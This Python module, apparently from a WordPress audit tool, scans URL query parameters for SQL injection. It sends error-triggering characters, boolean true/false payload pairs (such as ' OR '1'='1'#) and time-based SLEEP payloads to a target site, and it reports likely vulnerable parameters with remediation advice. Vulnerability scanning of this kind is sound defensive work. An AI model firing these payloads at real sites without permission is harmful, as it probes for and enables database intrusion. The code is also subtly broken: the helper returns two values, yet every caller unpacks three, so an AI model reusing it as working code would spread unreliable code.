mirror of
https://gh.wpcy.net/https://github.com/JulesJujuu/wpaudit.git
synced 2026-04-17 08:42:18 +08:00
354 lines
20 KiB
Python
354 lines
20 KiB
Python
# Module for Contextual WordPress SQLi Checks
|
|
import requests
|
|
import re
|
|
from urllib.parse import urlparse, parse_qs, urlencode, quote_plus
|
|
from .utils import make_request
|
|
import difflib # For comparing response bodies (optional, can be heavy)
|
|
|
|
# Common SQL error patterns (non-exhaustive)
|
|
SQL_ERROR_PATTERNS = [
|
|
re.compile(r"you have an error in your sql syntax", re.IGNORECASE),
|
|
re.compile(r"warning: mysql_", re.IGNORECASE),
|
|
re.compile(r"unclosed quotation mark after the character string", re.IGNORECASE),
|
|
re.compile(r"quoted string not properly terminated", re.IGNORECASE),
|
|
re.compile(r"SQL command not properly ended", re.IGNORECASE),
|
|
re.compile(r"Microsoft OLE DB Provider for SQL Server", re.IGNORECASE),
|
|
re.compile(r"Oracle ODBC Driver", re.IGNORECASE),
|
|
re.compile(r"supplied argument is not a valid MySQL result resource", re.IGNORECASE),
|
|
re.compile(r"PostgreSQL query failed", re.IGNORECASE),
|
|
re.compile(r"Syntax error near", re.IGNORECASE),
|
|
re.compile(r"ORA-\d{5}:", re.IGNORECASE) # Oracle errors
|
|
]
|
|
|
|
# Basic SQLi test characters for error-based
|
|
SQLI_ERROR_TEST_CHARS = ["'", "\"", "`", "-- ", "#", ";", "\\"]
|
|
|
|
# Basic Boolean-based SQLi payloads
|
|
# Payloads should be URL-encoded. '#' is used for comments for URL-friendliness.
|
|
# Structure: (payload_true_suffix, payload_false_suffix)
|
|
SQLI_BOOLEAN_PAYLOADS = {
|
|
"numeric_context": [
|
|
(" OR 1=1#", " OR 1=2#"),
|
|
(" AND 1=1#", " AND 1=2#"),
|
|
(" OR true#", " OR false#"),
|
|
(" AND true#", " AND false#"),
|
|
# Example: 123 OR GTID_SUBSET(SLEEP(0.1),SLEEP(0.1))#
|
|
# More complex conditions can be added
|
|
],
|
|
"string_context_single_quote": [
|
|
("' OR '1'='1'#", "' OR '1'='2'#"),
|
|
("' AND '1'='1'#", "' AND '1'='2'#"),
|
|
("' OR true#", "' OR false#"),
|
|
("' AND true#", "' AND false#"),
|
|
],
|
|
"string_context_double_quote": [
|
|
("\" OR \"1\"=\"1\"#", "\" OR \"1\"=\"2\"#"),
|
|
("\" AND \"1\"=\"1\"#", "\" AND \"1\"=\"2\"#"),
|
|
("\" OR true#", "\" OR false#"),
|
|
("\" AND true#", "\" AND false#"),
|
|
]
|
|
}
|
|
|
|
# Time-based Blind SQLi Payloads
|
|
# Using SLEEP function, common in MySQL/MariaDB (WordPress default)
|
|
# Structure: (payload_suffix, sleep_duration_seconds)
|
|
# {SLEEP_DURATION} will be replaced by the actual sleep duration.
|
|
SLEEP_DURATION_SECONDS = 5 # Configurable base sleep duration
|
|
SQLI_TIME_BASED_PAYLOADS = {
|
|
"numeric_context": [
|
|
(f" AND SLEEP({SLEEP_DURATION_SECONDS})#", SLEEP_DURATION_SECONDS),
|
|
(f" OR SLEEP({SLEEP_DURATION_SECONDS})#", SLEEP_DURATION_SECONDS),
|
|
# Benchmark can also be used but SLEEP is simpler for detection
|
|
# (f" AND BENCHMARK(5000000,MD5(1))#", SLEEP_DURATION_SECONDS), # Approx 5s on some systems
|
|
],
|
|
"string_context_single_quote": [
|
|
(f"' AND SLEEP({SLEEP_DURATION_SECONDS})-- ", SLEEP_DURATION_SECONDS), # Using -- for string context
|
|
(f"' OR SLEEP({SLEEP_DURATION_SECONDS})-- ", SLEEP_DURATION_SECONDS),
|
|
],
|
|
"string_context_double_quote": [
|
|
(f"\" AND SLEEP({SLEEP_DURATION_SECONDS})-- ", SLEEP_DURATION_SECONDS),
|
|
(f"\" OR SLEEP({SLEEP_DURATION_SECONDS})-- ", SLEEP_DURATION_SECONDS),
|
|
]
|
|
}
|
|
|
|
|
|
def _test_sqli_payload(url, config, expected_content_pattern=None, compare_to_response=None, expected_delay_seconds=None):
|
|
"""
|
|
Helper to test a single SQLi payload.
|
|
Checks for errors, content differences (boolean), or time delays (time-based).
|
|
Returns: (response_object, detail_message_string)
|
|
"""
|
|
request_timeout = config.get('request_timeout', 10) # Default general timeout
|
|
|
|
if expected_delay_seconds:
|
|
# For time-based tests, timeout needs to be greater than the expected delay.
|
|
time_based_buffer = config.get('time_based_test_buffer', 3) # e.g., 3 seconds buffer
|
|
request_timeout = expected_delay_seconds + time_based_buffer
|
|
|
|
try:
|
|
response = make_request(url, config, method="GET", timeout=request_timeout)
|
|
if not response: # make_request might return None on critical errors before request object is formed
|
|
return None, "No response object received from make_request"
|
|
|
|
elapsed_time = response.elapsed.total_seconds()
|
|
|
|
# 1. Time-based check (if applicable)
|
|
if expected_delay_seconds:
|
|
# Check if elapsed time is close to or greater than expected delay, but less than the request_timeout
|
|
# Allow a small tolerance (e.g., 90% of expected delay)
|
|
if (elapsed_time >= expected_delay_seconds * 0.9) and (elapsed_time < request_timeout):
|
|
return response, f"Potential time-based SQLi: Response took {elapsed_time:.2f}s (expected ~{expected_delay_seconds}s)"
|
|
|
|
if not response.text: # Check after time-based, as time-based might not need/have text
|
|
return response, "No response content" # Or response if time-based was positive
|
|
|
|
# 2. Error-based check
|
|
for pattern in SQL_ERROR_PATTERNS:
|
|
if pattern.search(response.text):
|
|
return response, f"SQL error pattern matched: {pattern.pattern}"
|
|
|
|
# 3. Boolean-based: Expected content pattern match (for "true" conditions)
|
|
if expected_content_pattern and expected_content_pattern.search(response.text):
|
|
return response, "Expected content pattern matched (boolean true)"
|
|
|
|
# 4. Boolean-based: Compare to another response (e.g., "true" vs "false" or "true" vs "original")
|
|
if compare_to_response and compare_to_response.text:
|
|
len_current = len(response.text)
|
|
len_compare = len(compare_to_response.text)
|
|
# Using a relative and absolute threshold for difference
|
|
# e.g. >100 bytes difference or >10% of the larger response's length
|
|
if abs(len_current - len_compare) > max(100, 0.1 * max(len_compare, len_current, 1)):
|
|
return response, f"Significant content length difference (current: {len_current}, compared: {len_compare})"
|
|
|
|
# Optional: More detailed diff (can be slow, consider for higher verbosity levels)
|
|
# diff = difflib.unified_diff(compare_to_response.text.splitlines(), response.text.splitlines(), lineterm='')
|
|
# diff_lines = list(diff)
|
|
# if len(diff_lines) > config.get('sqli_diff_line_threshold', 5):
|
|
# return response, f"Significant content difference detected ({len(diff_lines)} differing lines)"
|
|
|
|
return response, None # No specific SQLi indicator found by these checks
|
|
except requests.exceptions.Timeout:
|
|
# If expected_delay_seconds was set, this timeout is expected if it's just above the delay.
|
|
# However, if it's a genuine timeout beyond our calculated request_timeout for time-based, it's a fail.
|
|
# The make_request timeout handles this. Here, it means the request exceeded the (potentially extended) timeout.
|
|
return None, f"Request timed out after {request_timeout}s"
|
|
except Exception as e:
|
|
return None, f"Error during request: {e}"
|
|
|
|
|
|
def analyze_sqli(state, config, target_url):
|
|
"""
|
|
Performs enhanced heuristic checks for potential SQLi vulnerabilities.
|
|
Includes error-based checks and basic boolean-based differential analysis.
|
|
This is NOT a comprehensive SQLi scanner. Use SQLMap for thorough testing.
|
|
"""
|
|
module_key = "wp_analyzer"
|
|
findings_key = "contextual_sqli"
|
|
|
|
all_wp_analyzer_findings = state.get_module_findings(module_key, {})
|
|
findings = all_wp_analyzer_findings.get(findings_key, {})
|
|
if not findings: # Initialize with default structure
|
|
findings = {
|
|
"status": "Not Checked",
|
|
"details": "",
|
|
"potential_error_based_sqli": [],
|
|
"potential_boolean_based_sqli": [],
|
|
"potential_time_based_sqli": [],
|
|
"recommendation": "Use dedicated SQLi tools (like SQLMap) for comprehensive analysis."
|
|
}
|
|
|
|
findings["status"] = "Running"
|
|
findings["details"] = "Performing enhanced heuristic SQLi checks..."
|
|
for list_key in ["potential_error_based_sqli", "potential_boolean_based_sqli", "potential_time_based_sqli"]:
|
|
if list_key not in findings:
|
|
findings[list_key] = []
|
|
|
|
all_wp_analyzer_findings[findings_key] = findings
|
|
state.update_module_findings(module_key, all_wp_analyzer_findings) # Save initial state
|
|
|
|
print(" [i] Performing enhanced SQLi heuristic checks (error, boolean, time-based)...")
|
|
|
|
parsed_target_url = urlparse(target_url)
|
|
original_query_params = parse_qs(parsed_target_url.query)
|
|
|
|
error_based_points = []
|
|
boolean_based_points = []
|
|
time_based_points = [] # Added
|
|
|
|
if not original_query_params:
|
|
findings["details"] = "No query parameters in target URL to test for SQLi."
|
|
findings["status"] = "Completed"
|
|
all_wp_analyzer_findings = state.get_module_findings(module_key, {}) # Re-fetch
|
|
all_wp_analyzer_findings[findings_key] = findings
|
|
state.update_module_findings(module_key, all_wp_analyzer_findings)
|
|
print(" [i] No query parameters in target URL for SQLi checks.")
|
|
return
|
|
|
|
# Get original response for comparison in boolean tests
|
|
original_response, _, _ = _test_sqli_payload(target_url, config) # Adjusted return
|
|
if not original_response:
|
|
print(f" [-] Could not fetch original page {target_url}. Boolean-based checks might be less reliable.")
|
|
|
|
print(f" Checking {len(original_query_params)} parameter(s) in URL: {target_url}")
|
|
for param, values in original_query_params.items():
|
|
original_value = values[0]
|
|
# param_found_sqli is used to avoid redundant checks for the same param if one type of SQLi is already found.
|
|
# We can make this more granular if we want to find ALL types for a param.
|
|
# For now, if error-based is found, we might skip boolean/time for that specific error-inducing payload char,
|
|
# but continue other boolean/time tests for the param.
|
|
# Let's track found types per param to avoid over-reporting simple true/false positives from error pages.
|
|
found_error_for_param = False
|
|
found_boolean_for_param = False
|
|
found_time_for_param = False
|
|
|
|
# Ensure original_value is a string for concatenation
|
|
str_original_value = str(original_value) if original_value is not None else ""
|
|
|
|
# 1. Error-based SQLi checks
|
|
print(f" Testing error-based SQLi for param '{param}'...")
|
|
for test_char in SQLI_ERROR_TEST_CHARS:
|
|
if found_error_for_param: break
|
|
|
|
payload_val = str_original_value + test_char
|
|
modified_params = {k: v[0] for k, v in original_query_params.items()}
|
|
modified_params[param] = payload_val
|
|
test_query_string = urlencode(modified_params)
|
|
test_url = parsed_target_url._replace(query=test_query_string).geturl()
|
|
|
|
_, error_detail, _ = _test_sqli_payload(test_url, config) # Adjusted return
|
|
if error_detail and "SQL error pattern matched" in error_detail:
|
|
point_info = {
|
|
"url": test_url, "parameter": param, "payload_used": payload_val,
|
|
"type": "Error-based", "observation": error_detail
|
|
}
|
|
error_based_points.append(point_info)
|
|
found_error_for_param = True
|
|
print(f" [!!!] Potential Error-based SQLi for param '{param}' with char '{test_char}'")
|
|
# Don't break here; let other error chars be tested for completeness,
|
|
# but `found_error_for_param` will prevent boolean/time if an error is already clear.
|
|
|
|
# 2. Boolean-based SQLi checks (only if no definitive error-based found for this param yet)
|
|
if not found_error_for_param: # If an error was found, boolean might give false positives on error pages
|
|
print(f" Testing boolean-based SQLi for param '{param}'...")
|
|
for context_type, payload_pairs in SQLI_BOOLEAN_PAYLOADS.items():
|
|
if found_boolean_for_param: break
|
|
for true_payload_suffix, false_payload_suffix in payload_pairs:
|
|
payload_true_val = str_original_value + true_payload_suffix
|
|
modified_params_true = {k: v[0] for k, v in original_query_params.items()}
|
|
modified_params_true[param] = payload_true_val
|
|
query_true = urlencode(modified_params_true)
|
|
url_true = parsed_target_url._replace(query=query_true).geturl()
|
|
|
|
payload_false_val = str_original_value + false_payload_suffix
|
|
modified_params_false = {k: v[0] for k, v in original_query_params.items()}
|
|
modified_params_false[param] = payload_false_val
|
|
query_false = urlencode(modified_params_false)
|
|
url_false = parsed_target_url._replace(query=query_false).geturl()
|
|
|
|
print(f" Testing boolean pair for {context_type}: TRUE='{true_payload_suffix}', FALSE='{false_payload_suffix}'")
|
|
|
|
resp_true, detail_true, _ = _test_sqli_payload(url_true, config)
|
|
resp_false, detail_false, _ = _test_sqli_payload(url_false, config)
|
|
|
|
# Avoid boolean if payloads themselves caused SQL errors (already covered by error-based)
|
|
if (detail_true and "SQL error" in detail_true) or \
|
|
(detail_false and "SQL error" in detail_false):
|
|
print(f" Skipping boolean for {param} with {true_payload_suffix}/{false_payload_suffix} due to SQL error in response.")
|
|
continue
|
|
|
|
if resp_true and resp_false and original_response and original_response.text:
|
|
len_orig = len(original_response.text)
|
|
len_true = len(resp_true.text) if resp_true.text else 0
|
|
len_false = len(resp_false.text) if resp_false.text else 0
|
|
|
|
similar_threshold = config.get('sqli_boolean_similarity_threshold', 0.10) # 10%
|
|
|
|
# True is different from False
|
|
is_true_diff_false = abs(len_true - len_false) > similar_threshold * max(len_true, len_false, 1)
|
|
# True is like Original
|
|
is_true_like_orig = abs(len_true - len_orig) < similar_threshold * max(len_true, len_orig, 1)
|
|
# False is like Original
|
|
is_false_like_orig = abs(len_false - len_orig) < similar_threshold * max(len_false, len_orig, 1)
|
|
|
|
if is_true_diff_false and (is_true_like_orig != is_false_like_orig): # XOR
|
|
point_info = {
|
|
"url_true": url_true, "url_false": url_false, "parameter": param,
|
|
"payload_true": payload_true_val, "payload_false": payload_false_val,
|
|
"type": "Boolean-based (Differential)",
|
|
"observation": f"Response lengths: Original={len_orig}, True={len_true}, False={len_false}. Significant difference suggests boolean-based SQLi."
|
|
}
|
|
boolean_based_points.append(point_info)
|
|
found_boolean_for_param = True
|
|
print(f" [!!!] Potential Boolean-based SQLi for param '{param}' (Context: {context_type})")
|
|
break
|
|
if found_boolean_for_param: break
|
|
|
|
# 3. Time-based Blind SQLi checks (attempt regardless of error/boolean, as it's a distinct method)
|
|
# However, if an error was found, the page might not execute SQL further.
|
|
# Let's run it if no error was found, or be mindful of potential inaccuracies.
|
|
# For now, run if no error_based found, to reduce noise.
|
|
if not found_error_for_param:
|
|
print(f" Testing time-based SQLi for param '{param}'...")
|
|
for context_type, time_payloads in SQLI_TIME_BASED_PAYLOADS.items():
|
|
if found_time_for_param: break
|
|
for payload_suffix, sleep_duration in time_payloads:
|
|
|
|
payload_val = str_original_value + payload_suffix
|
|
modified_params = {k: v[0] for k, v in original_query_params.items()}
|
|
modified_params[param] = payload_val
|
|
test_query_string = urlencode(modified_params)
|
|
test_url = parsed_target_url._replace(query=test_query_string).geturl()
|
|
|
|
print(f" Testing time-based for {context_type} with '{payload_suffix}' (expect ~{sleep_duration}s delay)")
|
|
|
|
# Pass expected_delay_seconds to _test_sqli_payload
|
|
_, time_detail, _ = _test_sqli_payload(test_url, config, expected_delay_seconds=sleep_duration)
|
|
|
|
if time_detail and "Potential time-based SQLi" in time_detail:
|
|
point_info = {
|
|
"url": test_url, "parameter": param, "payload_used": payload_val,
|
|
"type": "Time-based Blind", "observation": time_detail
|
|
}
|
|
time_based_points.append(point_info)
|
|
found_time_for_param = True
|
|
print(f" [!!!] Potential Time-based SQLi for param '{param}' (Context: {context_type})")
|
|
break # Found for this payload, move to next context or param
|
|
if found_time_for_param: break
|
|
|
|
|
|
if error_based_points:
|
|
findings["potential_error_based_sqli"] = error_based_points
|
|
if boolean_based_points:
|
|
findings["potential_boolean_based_sqli"] = boolean_based_points
|
|
if time_based_points: # Added
|
|
findings["potential_time_based_sqli"] = time_based_points
|
|
|
|
details_parts = []
|
|
if error_based_points:
|
|
details_parts.append(f"{len(error_based_points)} potential error-based SQLi point(s)")
|
|
if boolean_based_points:
|
|
details_parts.append(f"{len(boolean_based_points)} potential boolean-based SQLi point(s)")
|
|
if time_based_points: # Added
|
|
details_parts.append(f"{len(time_based_points)} potential time-based SQLi point(s)")
|
|
|
|
if details_parts:
|
|
findings["details"] = f"Found {', '.join(details_parts)}. This strongly suggests SQLi vulnerabilities. Use SQLMap for confirmation and exploitation."
|
|
# Update remediation suggestion if it exists or add a new one
|
|
remediation_desc = f"Enhanced heuristic checks suggest potential SQL Injection vulnerabilities: {', '.join(details_parts)}."
|
|
if time_based_points:
|
|
remediation_desc += " Time-based techniques indicate blind SQLi is likely."
|
|
|
|
state.add_remediation_suggestion("sqli_heuristic_enhanced", {
|
|
"source": "WP Analyzer (SQLi Heuristic - Enhanced)",
|
|
"description": remediation_desc,
|
|
"severity": "High",
|
|
"remediation": "Immediately investigate and fix these potential SQLi vulnerabilities. Use parameterized queries or prepared statements. Validate and sanitize all user inputs. Run a full scan with a dedicated SQLi tool like SQLMap to confirm and assess the impact. Pay special attention to blind SQLi if time-based results were found."
|
|
})
|
|
else:
|
|
findings["details"] = "No obvious SQLi indicators detected from enhanced heuristic checks (error, boolean, time-based). This does not rule out SQLi. Use SQLMap for thorough testing."
|
|
|
|
findings["status"] = "Completed"
|
|
all_wp_analyzer_findings = state.get_module_findings(module_key, {}) # Re-fetch
|
|
all_wp_analyzer_findings[findings_key] = findings
|
|
state.update_module_findings(module_key, all_wp_analyzer_findings)
|
|
print(f" [+] Enhanced SQLi heuristic checks finished. Details: {findings['details']}")
|